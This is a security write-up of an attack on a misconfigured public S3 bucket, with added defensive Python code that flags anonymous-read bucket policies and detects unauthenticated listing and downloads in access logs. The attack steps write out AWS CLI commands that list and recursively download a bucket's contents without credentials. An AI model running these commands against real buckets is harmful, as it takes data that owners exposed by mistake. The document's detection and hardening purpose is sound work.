Publicly Exposed S3 Bucket Leading to Data Leakage
- Identify the S3 Bucket Name on a Public Website
  - An attacker discovers the name of an S3 bucket exposed on a public website.
  - Example: The website references the bucket name public-resources-bucket.
- Access the Bucket Without Authentication
  - Since the bucket is public, the attacker uses the following command to list its contents:
    aws s3 ls s3://[bucketName] --no-sign-request
  - Output: The bucket contains the following files, including sensitive information accidentally uploaded:
    2024-12-10 12:34:56 1024 public-file1.txt
    2024-12-10 12:35:00 2048 public-file2.png
    2024-12-10 12:35:10 1048576 sensitive-data.csv
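The listing above only works because the bucket's policy (or ACL) grants access to the anonymous principal, which is what `--no-sign-request` exercises by sending an unsigned request. The following added example, which is not part of the original write-up, evaluates a bucket policy document offline and flags Allow statements that grant `s3:ListBucket` or `s3:GetObject` to everyone (`Principal` of `"*"` or `{"AWS": "*"}`) without a `Condition` narrowing the grant. Both policy documents are constructed samples for `public-resources-bucket`, and the CloudFront distribution ARN in the hardened one is a placeholder.

```python
"""Flag bucket-policy statements that grant anonymous (unauthenticated) read access.

Added example, not code from the original scenario. It evaluates a bucket
policy document offline; the sample policies below are constructed and do not
belong to any real account. Deny statements and NotPrincipal are out of scope.
"""
import fnmatch
import json

# Actions an anonymous caller needs to enumerate or read bucket contents,
# i.e. what `aws s3 ls` / `aws s3 cp --no-sign-request` rely on.
READ_ACTIONS = ("s3:ListBucket", "s3:GetObject")


def _as_list(value):
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_anonymous_principal(principal):
    """True when the statement applies to everyone: "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def anonymous_read_grants(policy_json):
    """Return (Sid, matched read actions) for each Allow statement that grants
    anonymous list/read access with no Condition block."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_anonymous_principal(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            # A conditioned grant (VPC endpoint, source ARN, referer, ...) is
            # narrower than "the whole internet"; review it, but do not flag here.
            continue
        granted = _as_list(stmt.get("Action"))
        # Action values may contain wildcards ("s3:*", "s3:Get*"), so match
        # each sensitive action against every pattern, case-insensitively.
        matched = sorted(
            action for action in READ_ACTIONS
            if any(fnmatch.fnmatchcase(action.lower(), pattern.lower())
                   for pattern in granted)
        )
        if matched:
            findings.append((stmt.get("Sid", "<no Sid>"), matched))
    return findings


# Constructed policy resembling the misconfiguration in the scenario: both
# listing and object reads are open to everyone.
OPEN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicList", "Effect": "Allow", "Principal": "*",
         "Action": "s3:ListBucket",
         "Resource": "arn:aws:s3:::public-resources-bucket"},
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::public-resources-bucket/*"},
    ],
})

# Constructed hardened policy: objects under public/ are served only to a
# CloudFront distribution (service principal plus SourceArn condition), and
# nothing grants ListBucket to anonymous callers. The ARN is a placeholder.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "CloudFrontReadOnly", "Effect": "Allow",
         "Principal": {"Service": "cloudfront.amazonaws.com"},
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::public-resources-bucket/public/*",
         "Condition": {"StringEquals": {
             "AWS:SourceArn": "arn:aws:cloudfront::111122223333:distribution/PLACEHOLDER"}}},
    ],
})

if __name__ == "__main__":
    for name, doc in (("open", OPEN_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, anonymous_read_grants(doc))
```

Running the check against the open policy reports both `PublicList` and `PublicRead`; the hardened policy produces no findings. The same logic applies to a policy fetched with `aws s3api get-bucket-policy`, and enabling S3 Block Public Access (in particular `BlockPublicPolicy` and `RestrictPublicBuckets`) at the account level stops a policy like `OPEN_POLICY` from taking effect in the first place.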
- Download the Contents of the Bucket
  - The attacker downloads the bucket's contents using the following command:
    aws s3 cp s3://[bucketName] ./local-directory --recursive --no-sign-request
  - Result: The attacker gains access to both the publicly intended files and the accidentally exposed sensitive information, such as sensitive-data.csv.
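The two commands in this scenario leave a recognisable trail when S3 server access logging is enabled for the bucket: an anonymous request is logged with `-` in the requester field, `aws s3 ls` appears as `REST.GET.BUCKET`, and the recursive copy appears as a run of `REST.GET.OBJECT` records from the same source IP. The following added example, not part of the original write-up, parses such records and reports source IPs that listed the bucket and then fetched objects without credentials. The log lines are constructed samples that mirror the files in the scenario; the canonical user ID, request IDs, host ID and IP addresses are placeholders.

```python
"""Detect unauthenticated listing and downloads in S3 server access logs.

Added example, not part of the original scenario. S3 server access logging
writes one space-separated record per request; the requester field is "-"
for anonymous requests. The log lines below are constructed samples.
"""
import re
from collections import defaultdict

# A record token is a [bracketed timestamp], a "quoted string" or a bare field.
_TOKEN = re.compile(r'\[[^\]]*\]|"[^"]*"|\S+')

# Field positions in the S3 server access log format used by this detector.
F_BUCKET, F_TIME, F_IP, F_REQUESTER, F_OP, F_KEY, F_STATUS, F_BYTES = 1, 2, 3, 4, 6, 7, 9, 11


def parse_record(line):
    """Split one access log line into the fields needed for detection."""
    fields = _TOKEN.findall(line)
    if len(fields) < 12:
        return None  # truncated line or not an S3 access log record
    return {
        "bucket": fields[F_BUCKET],
        "time": fields[F_TIME].strip("[]"),
        "ip": fields[F_IP],
        "anonymous": fields[F_REQUESTER] == "-",
        "op": fields[F_OP],
        "key": fields[F_KEY],
        "status": fields[F_STATUS],
        "bytes": 0 if fields[F_BYTES] == "-" else int(fields[F_BYTES]),
    }


def anonymous_activity(lines):
    """Per source IP, count successful anonymous listings and object reads."""
    per_ip = defaultdict(lambda: {"listings": 0, "objects": [], "bytes": 0})
    for line in lines:
        rec = parse_record(line)
        if rec is None or not rec["anonymous"] or rec["status"] != "200":
            continue  # only authenticated or failed requests; nothing leaked
        entry = per_ip[rec["ip"]]
        if rec["op"] == "REST.GET.BUCKET":
            entry["listings"] += 1
        elif rec["op"] == "REST.GET.OBJECT":
            entry["objects"].append(rec["key"])
            entry["bytes"] += rec["bytes"]
    return dict(per_ip)


def enumerate_then_download(lines):
    """IPs that both listed the bucket and fetched objects anonymously, the
    pattern produced by `aws s3 ls` followed by `aws s3 cp --recursive`."""
    report = anonymous_activity(lines)
    return sorted(ip for ip, e in report.items() if e["listings"] and e["objects"])


OWNER = "0" * 64  # constructed placeholder for the bucket owner's canonical ID
HOST = "public-resources-bucket.s3.amazonaws.com"
LOG_LINES = [
    # anonymous listing of the bucket (requester "-", no signature, no auth type)
    f'{OWNER} public-resources-bucket [10/Dec/2024:13:02:11 +0000] 198.51.100.23 - 7C3F1A2B4D5E6F70 '
    f'REST.GET.BUCKET - "GET /public-resources-bucket?list-type=2 HTTP/1.1" 200 - 1532 - 18 17 '
    f'"-" "aws-cli/2.x" - HOSTID-PLACEHOLDER - TLS_AES_128_GCM_SHA256 - {HOST} TLSv1.3',
    # anonymous downloads of two files, including the accidentally exposed CSV
    f'{OWNER} public-resources-bucket [10/Dec/2024:13:02:14 +0000] 198.51.100.23 - 7C3F1A2B4D5E6F71 '
    f'REST.GET.OBJECT public-file1.txt "GET /public-resources-bucket/public-file1.txt HTTP/1.1" 200 - 1024 1024 9 8 '
    f'"-" "aws-cli/2.x" - HOSTID-PLACEHOLDER - TLS_AES_128_GCM_SHA256 - {HOST} TLSv1.3',
    f'{OWNER} public-resources-bucket [10/Dec/2024:13:02:15 +0000] 198.51.100.23 - 7C3F1A2B4D5E6F72 '
    f'REST.GET.OBJECT sensitive-data.csv "GET /public-resources-bucket/sensitive-data.csv HTTP/1.1" 200 - 1048576 1048576 210 12 '
    f'"-" "aws-cli/2.x" - HOSTID-PLACEHOLDER - TLS_AES_128_GCM_SHA256 - {HOST} TLSv1.3',
    # anonymous request for a missing key: 404, nothing returned, not counted
    f'{OWNER} public-resources-bucket [10/Dec/2024:13:02:16 +0000] 198.51.100.23 - 7C3F1A2B4D5E6F73 '
    f'REST.GET.OBJECT old-report.pdf "GET /public-resources-bucket/old-report.pdf HTTP/1.1" 404 NoSuchKey - - 6 - '
    f'"-" "aws-cli/2.x" - HOSTID-PLACEHOLDER - TLS_AES_128_GCM_SHA256 - {HOST} TLSv1.3',
    # authenticated upload by the site deployer (IAM user, SigV4): ignored
    f'{OWNER} public-resources-bucket [10/Dec/2024:12:35:00 +0000] 203.0.113.9 arn:aws:iam::111122223333:user/site-deployer '
    f'7C3F1A2B4D5E6F60 REST.PUT.OBJECT public-file2.png "PUT /public-resources-bucket/public-file2.png HTTP/1.1" 200 - - 2048 35 20 '
    f'"-" "aws-cli/2.x" - HOSTID-PLACEHOLDER SigV4 TLS_AES_128_GCM_SHA256 AuthHeader {HOST} TLSv1.3',
]

if __name__ == "__main__":
    for ip, entry in anonymous_activity(LOG_LINES).items():
        print(ip, entry)
    print("enumerate-then-download:", enumerate_then_download(LOG_LINES))
```

Against the sample records the report attributes one listing and two object reads (1,049,600 bytes in total, most of it `sensitive-data.csv`) to `198.51.100.23`, while the deployer's authenticated upload from `203.0.113.9` is not counted. The same fields are available in CloudTrail S3 data events, where an anonymous caller shows up as `userIdentity.type` of `AWSAccount` with no account ID, so the detection translates directly if access logs are not enabled.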